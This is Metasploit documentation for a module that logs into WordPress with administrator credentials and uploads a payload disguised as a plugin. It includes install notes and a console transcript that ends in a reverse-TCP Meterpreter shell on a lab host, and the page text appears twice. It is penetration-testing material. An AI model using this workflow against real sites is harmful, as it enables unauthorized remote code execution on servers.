documentation/modules/exploit/unix/webapp/wp_admin_shell_upload.md

## Vulnerable Application

This module takes an administrator username and password, logs into the
admin panel, and uploads a payload packaged as a WordPress plugin.
Becuase this is authenticated code execution by design, it should work
on all versions of WordPress.

### Vulnerable Application Installation

You can get WordPress from [https://wordpress.org/download/](https://wordpress.org/download/)
or from some Linux package managers. [Debian maintains an installation
guide](https://wiki.debian.org/WordPress) that also works on Ubuntu.
Note that in a default install of WP from apt, the plugins directory is
owned by root, so unless you chown it to the web user, this module will
not work. Doing so is common in real-world deployments to allow
legitimate administrators to install plugins, so it is not unreasonable
for your own installation.


## Verification steps

```
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf exploit(wp_admin_shell_upload) > set PASSWORD password
PASSWORD => password
msf exploit(wp_admin_shell_upload) > set TARGETURI /wp/
TARGETURI => /wp/
msf exploit(wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Authenticating with WordPress using admin:password...
[+] Login successful
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Acquired a plugin upload nonce: afa507398f
[*] Uploaded plugin iHNhrYLmGR
[*] Executing the payload at /wp/wp-content/plugins/iHNhrYLmGR/DcrpFXPOCG.php...
[*] Sending stage (33986 bytes) to 192.168.100.131
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.131:40039) at 2017-04-21 11:36:33 -0500
[+] Deleted DcrpFXPOCG.php
[+] Deleted iHNhrYLmGR.php

meterpreter > pwd
/var/lib/wordpress/wp-content/plugins/iHNhrYLmGR
meterpreter >
```
Add docs for wp_admin_shell_upload 2017-04-24 15:48:55 -05:00			`## Vulnerable Application`

			`This module takes an administrator username and password, logs into the`
			`admin panel, and uploads a payload packaged as a WordPress plugin.`
			`Becuase this is authenticated code execution by design, it should work`
			`on all versions of WordPress.`

			`### Vulnerable Application Installation`

			`You can get WordPress from [https://wordpress.org/download/](https://wordpress.org/download/)`
			`or from some Linux package managers. [Debian maintains an installation`
			`guide](https://wiki.debian.org/WordPress) that also works on Ubuntu.`
			`Note that in a default install of WP from apt, the plugins directory is`
			`owned by root, so unless you chown it to the web user, this module will`
			`not work. Doing so is common in real-world deployments to allow`
			`legitimate administrators to install plugins, so it is not unreasonable`
			`for your own installation.`


			`## Verification steps`

			```
			`msf > use exploit/unix/webapp/wp_admin_shell_upload`
			`msf exploit(wp_admin_shell_upload) > set USERNAME admin`
			`USERNAME => admin`
			`msf exploit(wp_admin_shell_upload) > set PASSWORD password`
			`PASSWORD => password`
			`msf exploit(wp_admin_shell_upload) > set TARGETURI /wp/`
			`TARGETURI => /wp/`
			`msf exploit(wp_admin_shell_upload) > run`

			`[*] Started reverse TCP handler on 0.0.0.0:4444`
			`[*] Authenticating with WordPress using admin:password...`
			`[+] Login successful`
			`[+] Authenticated with WordPress`
			`[*] Preparing payload...`
			`[*] Uploading payload...`
			`[*] Acquired a plugin upload nonce: afa507398f`
			`[*] Uploaded plugin iHNhrYLmGR`
			`[*] Executing the payload at /wp/wp-content/plugins/iHNhrYLmGR/DcrpFXPOCG.php...`
			`[*] Sending stage (33986 bytes) to 192.168.100.131`
			`[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.131:40039) at 2017-04-21 11:36:33 -0500`
			`[+] Deleted DcrpFXPOCG.php`
			`[+] Deleted iHNhrYLmGR.php`

			`meterpreter > pwd`
			`/var/lib/wordpress/wp-content/plugins/iHNhrYLmGR`
			`meterpreter >`
			```